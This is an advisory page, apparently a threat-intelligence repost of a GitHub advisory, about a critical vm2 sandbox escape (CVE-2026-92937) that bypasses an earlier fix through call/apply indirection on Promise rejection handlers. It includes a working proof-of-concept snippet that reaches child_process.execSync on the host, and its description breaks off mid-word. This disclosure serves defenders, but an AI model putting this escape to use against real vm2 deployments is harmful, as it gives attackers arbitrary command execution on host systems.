criticalCVSS 10Vulnerability

CVE-2026-92937

## Summary Untrusted JavaScript run by vm2 can escape the sandbox and execute arbitrary commands in the host Node.js process when an embedder-exposed host Promise rejects. This is an incomplete fix for GHSA-m283-3h24-438v: the advisory's capability-bearing rejection rebuild runs only through this direct Promise-handler path, so call/apply indirection bypasses the protection it introduced. The bridge sanitises host rejection values before sandbox callbacks run, but the gate at `lib/bridge.js:1624` identity-checks only the direct call target. Registering the rejection handler through `Function.prototype.call` indirection, `p.then.call(p, undefined, cb)`, makes the intercepted target host `Function.prototype.call`, so the sanitiser never runs and the raw host error reaches the sandbox (`lib/bridge.js:1639`) without the rebuild that strips host references carried by its own properties (`lib/setup-sandbox.js:2104`). A rejection error whose own property references a powerful host object, for example `err.detail = process`, therefore reaches sandbox code as a fully functional proxy, and `e.detail.mainModule.require('child_process').execSync(...)` executes with host privileges. The `.apply` form and a stacked `call.call` behave identically. ## PoC Save as `poc.js` and run `node poc.js`: ```js const { VM } = require('vm2'); const vm = new VM({ sandbox: { fetchUser: async () => { const err = new Error('db connection failed'); err.detail = process; // embedder-attached host reference throw err; }, }}); vm.run(` const p = fetchUser(1); // proxy of the host Promise p.then.call(p, undefined, (e) => { // .call indirection skips the sanitiser e.detail.mainModule.require('child_process') .execSync('echo vm2-escape-proof > /tmp/poc.proof'); }); `); ``` ### Observed output ```shell $ cat /tmp/poc.proof vm2-escape-proof ``` Registering the same callback directly, `p.then(undefined, cb)`, strips `detail` and no command runs; the `bin

Properties

severity
critical
summary
vm2: GHSA-m283-3h24-438v fix bypass leads to host RCE via call/apply indirection
cvss_score
10
retrieved_at
2026-10-01T19:14:01+00:00
ghsa_published
2026-10-01T15:32:10Z
source_url
https://github.com/advisories/GHSA-647f-g98j-qq25
ghsa_updated
2026-10-01T15:32:11Z
ghsa_id
GHSA-647f-g98j-qq25
last_source
GitHub Advisory Database
cve_id
CVE-2026-92937
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
signal_observed_at
2026-10-01T19:14:01+00:00
is_ghsa_only
false

Related Entities (5)

VULNERABLE_TO (1)

←[Software]npm/vm2

AFFECTS (1)

→[Software]npm/vm2

HAS_WEAKNESS (2)

→[Weakness]Protection Mechanism Failure
→[Weakness]Improper Control of Generation of Code ('Code Injection')

REPORTED_BY (1)

→[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-92937 (CVSS 10) — Ninja Signal Threat Intelligence | Ninja Signal